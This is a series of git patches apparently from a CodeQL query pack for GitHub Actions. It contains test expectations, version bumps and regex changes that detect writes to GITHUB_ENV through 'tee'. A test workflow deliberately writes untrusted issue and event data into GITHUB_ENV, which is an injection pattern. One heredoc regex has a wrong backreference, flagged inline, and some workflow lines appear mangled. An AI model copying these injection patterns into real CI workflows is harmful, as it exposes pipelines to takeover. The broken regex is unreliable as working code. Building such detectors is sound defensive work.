.github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Unpinned 3rd party Action 'Python CI' step $@ uses 'peter-evans/create-pull-request' with ref '5', not a pinned commit hash | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Uses Step: create_pr | -| 
.github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'thollander/actions-comment-pull-request' with ref '2', not a pinned commit hash | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Uses Step | -| .github/workflows/issue_comment_3rd_party_action.yml:12:9:16:6 | Uses Step: comment-branch | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref '2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:12:9:16:6 | Uses Step: comment-branch | Uses Step: comment-branch | -| .github/workflows/issue_comment_3rd_party_action.yml:25:9:30:6 | Uses Step: comment-branch | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref '2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:25:9:30:6 | Uses Step: comment-branch | Uses Step: comment-branch | +| .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Uses Step | +| .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Uses Step | +| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref 'v2', not a pinned commit hash | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | Uses Step | +| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 
'dawidd6/action-download-artifact' with ref 'v2', not a pinned commit hash | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | Uses Step | +| .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | Unpinned 3rd party Action 'artifactpoisoning71.yml' step $@ uses 'dawidd6/action-download-artifact' with ref 'v2', not a pinned commit hash | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | Uses Step | +| .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'codecov/codecov-action' with ref 'v3', not a pinned commit hash | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Uses Step | +| .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Unpinned 3rd party Action 'Python CI' step $@ uses 'peter-evans/create-pull-request' with ref 'v5', not a pinned commit hash | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Uses Step: create_pr | +| .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'thollander/actions-comment-pull-request' with ref 'v2', not a pinned commit hash | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Uses Step | +| .github/workflows/issue_comment_3rd_party_action.yml:12:9:16:6 | Uses Step: comment-branch | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref 'v2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:12:9:16:6 | Uses Step: comment-branch | Uses Step: comment-branch | +| .github/workflows/issue_comment_3rd_party_action.yml:25:9:30:6 | Uses Step: comment-branch | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref 'v2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:25:9:30:6 | Uses Step: comment-branch | Uses Step: comment-branch | | 
.github/workflows/issue_comment_3rd_party_action.yml:39:9:45:6 | Uses Step: refs | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'eficode/resolve-pr-refs' with ref 'main', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:39:9:45:6 | Uses Step: refs | Uses Step: refs | -| .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref '2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | Uses Step: fetch_issue | -| .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref '2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | Uses Step: fetch_pr | -| .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref '2.0.2', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | Uses Step: request | -| .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref '2', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Uses Step | -| .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref '1', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Uses Step | -| .github/workflows/level0.yml:36:9:39:6 | Uses Step | Unpinned 3rd party Action 'Poutine Level 0' step $@ uses 'rlespinasse/github-slug-action' with ref 
'4', not a pinned commit hash | .github/workflows/level0.yml:36:9:39:6 | Uses Step | Uses Step | -| .github/workflows/mend.yml:29:9:33:28 | Uses Step | Unpinned 3rd party Action 'Test' step $@ uses 'ruby/setup-ruby' with ref '1', not a pinned commit hash | .github/workflows/mend.yml:29:9:33:28 | Uses Step | Uses Step | -| .github/workflows/test7.yml:24:9:27:6 | Uses Step | Unpinned 3rd party Action 'Benchmark' step $@ uses 'pnpm/action-setup' with ref '3', not a pinned commit hash | .github/workflows/test7.yml:24:9:27:6 | Uses Step | Uses Step | -| .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Unpinned 3rd party Action 'unpinned_tags.yml' step $@ uses 'foo/bar' with ref '1', not a pinned commit hash | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Uses Step | +| .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | Uses Step: fetch_issue | +| .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | Uses Step: fetch_pr | +| .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.0.2', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | Uses Step: request | +| .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | 
.github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Uses Step | +| .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Uses Step | +| .github/workflows/level0.yml:36:9:39:6 | Uses Step | Unpinned 3rd party Action 'Poutine Level 0' step $@ uses 'rlespinasse/github-slug-action' with ref 'v4', not a pinned commit hash | .github/workflows/level0.yml:36:9:39:6 | Uses Step | Uses Step | +| .github/workflows/mend.yml:29:9:33:28 | Uses Step | Unpinned 3rd party Action 'Test' step $@ uses 'ruby/setup-ruby' with ref 'v1', not a pinned commit hash | .github/workflows/mend.yml:29:9:33:28 | Uses Step | Uses Step | +| .github/workflows/test7.yml:24:9:27:6 | Uses Step | Unpinned 3rd party Action 'Benchmark' step $@ uses 'pnpm/action-setup' with ref 'v3', not a pinned commit hash | .github/workflows/test7.yml:24:9:27:6 | Uses Step | Uses Step | +| .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Unpinned 3rd party Action 'unpinned_tags.yml' step $@ uses 'foo/bar' with ref 'v1', not a pinned commit hash | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Uses Step | From c9b7340718863d318202253286f5c5bb71edb2ad Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 1 Aug 2024 11:38:46 +0200 Subject: [PATCH 442/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 93f6688d2b41..856fbaebb193 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.27 +version: 0.1.28 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 
diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 6ceb57f09461..73dff5a1dc8c 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.27 +version: 0.1.28 groups: [actions, queries] suites: codeql-suites extractor: javascript From def170425af2e3553523964640572a6f4a3e2083 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 1 Aug 2024 11:43:48 +0200 Subject: [PATCH 443/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 856fbaebb193..dff01f80f2b5 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.28 +version: 0.1.29 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 73dff5a1dc8c..1070a8e9a977 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.28 +version: 0.1.29 groups: [actions, queries] suites: codeql-suites extractor: javascript From f457537b34e36559e621081691375a14cad0db49 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 1 Aug 2024 17:47:23 +0200 Subject: [PATCH 444/707] feat(bash): Add support for tee as a way to write to GITHUB special files --- ql/lib/codeql/actions/Helper.qll | 22 +- .../.github/workflows/multiline2.yml | 89 ++++++ .../library-tests/poisonable_steps.expected | 2 + ql/test/library-tests/test.expected | 265 +++++++++++++++++- 4 files changed, 366 insertions(+), 12 deletions(-) create mode 100644 ql/test/library-tests/.github/workflows/multiline2.yml diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll index cd964a6621d7..f177c645dbdc 100644 --- a/ql/lib/codeql/actions/Helper.qll +++ b/ql/lib/codeql/actions/Helper.qll 
@@ -74,9 +74,10 @@ predicate extractVariableAndValue(string raw_content, string key, string value)
 bindingset[script]
 predicate singleLineFileWrite(string script, string cmd, string file, string content, string filters) {
 exists(string regexp |
- regexp = "(?i)(echo|printf|write-output)\\s*(.*?)\\s*(>>|>)\\s*(\\S+)" and
+ regexp =
+ "(?i)(echo|printf|write-output)\\s*(.*?)\\s*(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+)" and
 cmd = script.regexpCapture(regexp, 1) and
- file = trimQuotes(script.regexpCapture(regexp, 4)) and
+ file = trimQuotes(script.regexpCapture(regexp, 5)) and
 filters = "" and
 content = script.regexpCapture(regexp, 2)
 )
@@ -100,18 +101,19 @@ predicate singleLineWorkflowCmd(string script, string cmd, string key, string va
 bindingset[script]
 predicate heredocFileWrite(string script, string cmd, string file, string content, string filters) {
 exists(string regexp |
- regexp = "(?msi).*^(cat)\\s*(>>|>)\\s*(\\S+)\\s*<<\\s*['\"]?(\\S+)['\"]?\\s*\n(.*?)\n\\4\\s*$.*" and
+ regexp =
+ "(?msi).*^(cat)\\s*(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+)\\s*<<\\s*['\"]?(\\S+)['\"]?\\s*\n(.*?)\n\\4\\s*$.*" and
 cmd = script.regexpCapture(regexp, 1) and
- file = trimQuotes(script.regexpCapture(regexp, 3)) and
- content = script.regexpCapture(regexp, 5) and
+ file = trimQuotes(script.regexpCapture(regexp, 4)) and
+ content = script.regexpCapture(regexp, 6) and
 filters = "" or
 regexp =
- "(?msi).*^(cat)\\s*(<<|<)\\s*[-]?['\"]?(\\S+)['\"]?\\s*([^>]*)(>>|>)\\s*(\\S+)\\s*\n(.*?)\n\\3\\s*$.*" and
+ "(?msi).*^(cat)\\s*(<<|<)\\s*[-]?['\"]?(\\S+)['\"]?\\s*([^>]*)(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+)\\s*\n(.*?)\n\\3\\s*$.*" and
 cmd = script.regexpCapture(regexp, 1) and
- file = trimQuotes(script.regexpCapture(regexp, 6)) and
+ file = trimQuotes(script.regexpCapture(regexp, 7)) and
 filters = script.regexpCapture(regexp, 4) and
- content = script.regexpCapture(regexp, 7)
+ content = script.regexpCapture(regexp, 8)
 )
 }
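Review bot: In the first `heredocFileWrite` regexp the new `(-a|--append)?` group shifts every later capture by one, and `file` and `content` were renumbered to 4 and 6 accordingly, but the heredoc-terminator backreference `\\4` was left as is and now refers to the output file instead of the delimiter captured in group 5. As written, a script such as `cat | tee -a $GITHUB_ENV << EOL … EOL` can only satisfy this branch if the closing line repeats the file name, so the tee form this commit sets out to support is unlikely to be recognised by it; the backreference should read `\\5\\s*$.*`. The second regexp is unaffected because its tee group is inserted after the `\\3` delimiter group, and the `singleLineFileWrite` hunk above was renumbered consistently.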
@@ -142,13 +144,13 @@ predicate blockFileWrite(string script, string cmd, string file, string content,
 //
 "(.*?)" +
 //
- "(\\s*\\}\\s*(>>|>)\\s*(\\S+))\\s*$.*" and
+ "(\\s*\\}\\s*(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+))\\s*$.*" and
 content =
 script
 .regexpCapture(regexp, 1)
 .regexpReplaceAll("(?m)^\\s*(echo|printf|write-output)\\s*['\"](.*?)['\"]", "$2")
 .regexpReplaceAll("(?m)^\\s*(echo|printf|write-output)\\s*", "") and
- file = trimQuotes(script.regexpCapture(regexp, 4)) and
+ file = trimQuotes(script.regexpCapture(regexp, 5)) and
 cmd = "echo" and
 filters = ""
 )
diff --git a/ql/test/library-tests/.github/workflows/multiline2.yml b/ql/test/library-tests/.github/workflows/multiline2.yml
new file mode 100644
index 000000000000..1941dd8f22ab
--- /dev/null
+++ b/ql/test/library-tests/.github/workflows/multiline2.yml
@@ -0,0 +1,89 @@ +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Test: + runs-on: ubuntu-latest + steps: + - run: | + echo "changelog< event.json + ${{ toJson(github.event) }} + EOF + - name: heredoc11 + run: | + cat | tee -a $GITHUB_ENV << EOL + ${ISSUE_BODY} + FOO + EOL + - name: heredoc12 + run: | + cat > issue.txt << EOL + ${ISSUE_BODY} + FOO + EOL + - name: heredoc21 + run: | + cat << EOL | tee -a $GITHUB_ENV + ${ISSUE_BODY} + FOO + EOL + - name: heredoc22 + run: | + cat < file.txt + Hello + World + EOF + - name: heredoc23 + run: | + cat <<-EOF | tee -a "$GITHUB_ENV" + echo "FOO=$TITLE" + EOF + - name: line1 + run: | + echo REPO_NAME=$(cat issue.txt | sed 's/\\r/\\n/g' | grep -ioE '\\s*[a-z0-9_-]+/[a-z0-9_-]+\\s*$' | tr -d ' ') | tee -a $GITHUB_ENV + - name: multiline1 + run: | + echo "PR_TITLE< event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | cat < file.txt\nHello\nWorld\nEOF\n | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | echo "PR_TITLE<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | | .github/workflows/multiline.yml:15:9:20:6 | Run Step | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> 
$GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | | .github/workflows/multiline.yml:20:9:24:6 | Run Step | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | @@ -149,6 +183,7 @@ runExprs | .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | +| .github/workflows/multiline2.yml:30:9:34:6 | Run Step | .github/workflows/multiline2.yml:32:13:32:39 | toJson(github.event) | | .github/workflows/multiline.yml:30:9:34:6 | Run Step | .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | 
@@ -173,6 +208,31 @@ runStepChildren | .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | | .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | .github/workflows/multiline2.yml:11:14:14:54 | echo "changelog< event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | .github/workflows/multiline2.yml:34:15:34:23 | heredoc11 | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | .github/workflows/multiline2.yml:40:15:40:23 | heredoc12 | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | .github/workflows/multiline2.yml:46:15:46:23 | heredoc21 | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | .github/workflows/multiline2.yml:52:15:52:23 | heredoc22 | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | +| 
.github/workflows/multiline2.yml:58:9:63:6 | Run Step | .github/workflows/multiline2.yml:58:15:58:23 | heredoc23 | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | .github/workflows/multiline2.yml:63:15:63:19 | line1 | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | .github/workflows/multiline2.yml:66:15:66:24 | multiline1 | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | .github/workflows/multiline2.yml:67:14:70:42 | echo "PR_TITLE<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | | .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | | .github/workflows/multiline.yml:20:9:24:6 | Run Step | .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | 
@@ -278,6 +338,108 @@ parentNodes | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/multiline2.yml:2:3:2:14 | workflow_run | .github/workflows/multiline2.yml:2:3:5:18 | workflow_run: | +| .github/workflows/multiline2.yml:2:3:5:18 | workflow_run: | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:3:17:3:22 | Prev | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:3:17:3:22 | Prev | .github/workflows/multiline2.yml:2:3:2:14 | workflow_run | +| .github/workflows/multiline2.yml:3:17:3:22 | Prev | .github/workflows/multiline2.yml:2:3:5:18 | workflow_run: | +| .github/workflows/multiline2.yml:5:9:5:17 | completed | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:5:9:5:17 | completed | .github/workflows/multiline2.yml:2:3:2:14 | workflow_run | +| .github/workflows/multiline2.yml:5:9:5:17 | completed | .github/workflows/multiline2.yml:2:3:5:18 | workflow_run: | +| .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:9:14:9:26 | ubuntu-latest | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:9:14:9:26 | ubuntu-latest | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:11:9:15:6 | Run Step 
| .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:11:14:14:54 | echo "changelog< event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline2.yml:30:9:34:6 | Run Step | +| .github/workflows/multiline2.yml:32:13:32:39 | toJson(github.event) | .github/workflows/multiline2.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:34:15:34:23 | heredoc11 | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:34:15:34:23 | heredoc11 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:34:15:34:23 | heredoc11 | .github/workflows/multiline2.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:40:15:40:23 | heredoc12 | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:40:15:40:23 | 
heredoc12 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:40:15:40:23 | heredoc12 | .github/workflows/multiline2.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:46:15:46:23 | heredoc21 | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:46:15:46:23 | heredoc21 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:46:15:46:23 | heredoc21 | .github/workflows/multiline2.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a 